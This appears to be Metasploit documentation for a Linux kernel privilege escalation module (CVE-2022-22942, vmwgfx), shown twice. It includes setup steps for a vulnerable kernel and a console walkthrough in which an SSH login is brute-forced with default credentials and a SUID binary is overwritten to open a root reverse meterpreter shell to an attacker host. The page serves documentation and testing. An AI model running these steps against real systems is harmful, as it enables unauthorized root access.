documentation/modules/exploit/linux/local/vmwgfx_fd_priv_esc.md

## Vulnerable Application

If the vmwgfx driver fails to copy the 'fence_rep' object to userland, it tries to
recover by deallocating the (already populated) file descriptor. This is
wrong, as the fd gets released via put_unused_fd() which shouldn't be used,
as the fd table slot was already populated via the previous call to
fd_install(). This leaves userland with a valid fd table entry pointing to
a free'd 'file' object.

We use this bug to overwrite a SUID binary with our payload and gain root.
Linux kernel 4.14-rc1 - 5.17-rc1 are vulnerable.

Successfully tested against Ubuntu 22.04.01 with kernel 5.13.12-051312-generic.

### Install

To install a vulnerable kernel on Ubuntu 22.04.01, follow these instructions:

1. Download the `linux-*` modules for a vulnerable kernel, such as https://kernel.ubuntu.com/~kernel-ppa/mainline/v5.13.12/amd64/
2. Install `libssl.1` (https://askubuntu.com/a/1403683)
   1. `echo "deb http://security.ubuntu.com/ubuntu focal-security main" | sudo tee /etc/apt/sources.list.d/focal-security.list`
   2. `sudo apt-get update`
   3. `sudo apt-get install libssl1.1`
   4. `sudo rm /etc/apt/sources.list.d/focal-security.list`
3. `sudo apt-get install build-essential`
4. `sudo dpkg -i *.deb`
5. Follow [these instructions](https://gist.github.com/chaiyujin/c08e59752c3e238ff3b1a5098322b363) to boot the vuln kernel
6. `sudo reboot`

## Verification Steps

1. Start msfconsole
2. Get an initial user shell
3. Do: `use linux/local/vmwgfx_fd_priv_esc`
4. Do: `set session [#]`
5. Do: `run`
6. You should get a root shell.

## Options

## Scenarios

### Ubuntu 22.04.01 with kernel 5.13.12-051312-generic

Gain initial user access

```
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 1.1.1.1
rhosts => 1.1.1.1
msf6 auxiliary(scanner/ssh/ssh_login) > set username ubuntu
username => ubuntu
msf6 auxiliary(scanner/ssh/ssh_login) > set password ubuntu
password => ubuntu
msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 1.1.1.1:22 - Starting bruteforce
[+] 1.1.1.1:22 - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd) Linux ubuntu2204 5.13.12-051312-generic #202108180838 SMP Wed Aug 18 08:41:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux '
[*] SSH session 1 opened (2.2.2.2:40003 -> 1.1.1.1:22) at 2022-11-25 08:47:08 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)
^Z
Background session 1? [y/N]  y
```

priv esc

```
msf6 auxiliary(scanner/ssh/ssh_login) > use linux/local/vmwgfx_fd_priv_esc
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > set verbose true
verbose => true
msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > set session 1
session => 1
msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > set lhost 2.2.2.2
lhost => 2.2.2.2
msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > exploit

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: 
[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Kernel version 5.13.12-051312-generic appears to be vulnerable
[+] /dev/dri/card0 found writable
[+] /bin/chfn suid binary found
[+] The target appears to be vulnerable. vmwgfx installed
[+] Original /bin/chfn backed up to /root/.msf4/loot/20221125085335_default_1.1.1.1_binchfn_651737.bin
[+] gcc is installed
[*] Live compiling exploit on system...
[*] Max line length is 65537
[*] Writing 10814 bytes in 1 chunks of 39254 bytes (octal-encoded), using printf
[*] Uploading payload to /tmp/.Qpm6q
[*] Writing '/tmp/.Qpm6q' (282 bytes) ...
[*] Max line length is 65537
[*] Writing 282 bytes in 1 chunks of 843 bytes (octal-encoded), using printf
[*] Launching exploit...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045348 bytes) to 1.1.1.1
[*] Replacing trojaned /bin/chfn with original
[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:38250) at 2022-11-25 08:54:14 -0500

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 1.1.1.1
OS           : Ubuntu 22.04 (Linux 5.13.12-051312-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```
cve-2022-22942 2022-11-25 13:05:47 -05:00			`## Vulnerable Application`

			`If the vmwgfx driver fails to copy the 'fence_rep' object to userland, it tries to`
			`recover by deallocating the (already populated) file descriptor. This is`
			`wrong, as the fd gets released via put_unused_fd() which shouldn't be used,`
			`as the fd table slot was already populated via the previous call to`
			`fd_install(). This leaves userland with a valid fd table entry pointing to`
			`a free'd 'file' object.`

			`We use this bug to overwrite a SUID binary with our payload and gain root.`
			`Linux kernel 4.14-rc1 - 5.17-rc1 are vulnerable.`

			`Successfully tested against Ubuntu 22.04.01 with kernel 5.13.12-051312-generic.`

			`### Install`

			`To install a vulnerable kernel on Ubuntu 22.04.01, follow these instructions:`

			1. Download the `linux-*` modules for a vulnerable kernel, such as https://kernel.ubuntu.com/~kernel-ppa/mainline/v5.13.12/amd64/
			2. Install `libssl.1` (https://askubuntu.com/a/1403683)
			1. `echo "deb http://security.ubuntu.com/ubuntu focal-security main" \| sudo tee /etc/apt/sources.list.d/focal-security.list`
			2. `sudo apt-get update`
			3. `sudo apt-get install libssl1.1`
			4. `sudo rm /etc/apt/sources.list.d/focal-security.list`
			3. `sudo apt-get install build-essential`
			4. `sudo dpkg -i *.deb`
			`5. Follow [these instructions](https://gist.github.com/chaiyujin/c08e59752c3e238ff3b1a5098322b363) to boot the vuln kernel`
			6. `sudo reboot`

			`## Verification Steps`

			`1. Start msfconsole`
			`2. Get an initial user shell`
			3. Do: `use linux/local/vmwgfx_fd_priv_esc`
			4. Do: `set session [#]`
			5. Do: `run`
			`6. You should get a root shell.`

			`## Options`

			`## Scenarios`

			`### Ubuntu 22.04.01 with kernel 5.13.12-051312-generic`

			`Gain initial user access`

			```
			`msf6 > use auxiliary/scanner/ssh/ssh_login`
			`msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 1.1.1.1`
			`rhosts => 1.1.1.1`
			`msf6 auxiliary(scanner/ssh/ssh_login) > set username ubuntu`
			`username => ubuntu`
			`msf6 auxiliary(scanner/ssh/ssh_login) > set password ubuntu`
			`password => ubuntu`
			`msf6 auxiliary(scanner/ssh/ssh_login) > run`

			`[*] 1.1.1.1:22 - Starting bruteforce`
			`[+] 1.1.1.1:22 - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd) Linux ubuntu2204 5.13.12-051312-generic #202108180838 SMP Wed Aug 18 08:41:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux '`
			`[*] SSH session 1 opened (2.2.2.2:40003 -> 1.1.1.1:22) at 2022-11-25 08:47:08 -0500`
			`[*] Scanned 1 of 1 hosts (100% complete)`
			`[*] Auxiliary module execution completed`
			`msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 1`
			`[*] Starting interaction with 1...`

			`id`
			`uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)`
			`^Z`
			`Background session 1? [y/N] y`
			```

			`priv esc`

			```
			`msf6 auxiliary(scanner/ssh/ssh_login) > use linux/local/vmwgfx_fd_priv_esc`
			`[*] Using configured payload linux/x64/meterpreter/reverse_tcp`
			`msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > set verbose true`
			`verbose => true`
			`msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > set session 1`
			`session => 1`
			`msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > set lhost 2.2.2.2`
			`lhost => 2.2.2.2`
			`msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > exploit`

			`[!] SESSION may not be compatible with this module:`
			`[!] * incompatible session architecture:`
			`[*] Started reverse TCP handler on 2.2.2.2:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[+] Kernel version 5.13.12-051312-generic appears to be vulnerable`
			`[+] /dev/dri/card0 found writable`
			`[+] /bin/chfn suid binary found`
			`[+] The target appears to be vulnerable. vmwgfx installed`
			`[+] Original /bin/chfn backed up to /root/.msf4/loot/20221125085335_default_1.1.1.1_binchfn_651737.bin`
			`[+] gcc is installed`
			`[*] Live compiling exploit on system...`
			`[*] Max line length is 65537`
			`[*] Writing 10814 bytes in 1 chunks of 39254 bytes (octal-encoded), using printf`
			`[*] Uploading payload to /tmp/.Qpm6q`
			`[*] Writing '/tmp/.Qpm6q' (282 bytes) ...`
			`[*] Max line length is 65537`
			`[*] Writing 282 bytes in 1 chunks of 843 bytes (octal-encoded), using printf`
			`[*] Launching exploit...`
			`[*] Transmitting intermediate stager...(126 bytes)`
			`[*] Sending stage (3045348 bytes) to 1.1.1.1`
			`[*] Replacing trojaned /bin/chfn with original`
			`[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:38250) at 2022-11-25 08:54:14 -0500`

			`meterpreter > getuid`
			`Server username: root`
			`meterpreter > sysinfo`
			`Computer : 1.1.1.1`
			`OS : Ubuntu 22.04 (Linux 5.13.12-051312-generic)`
			`Architecture : x64`
			`BuildTuple : x86_64-linux-musl`
			`Meterpreter : x64/linux`
			```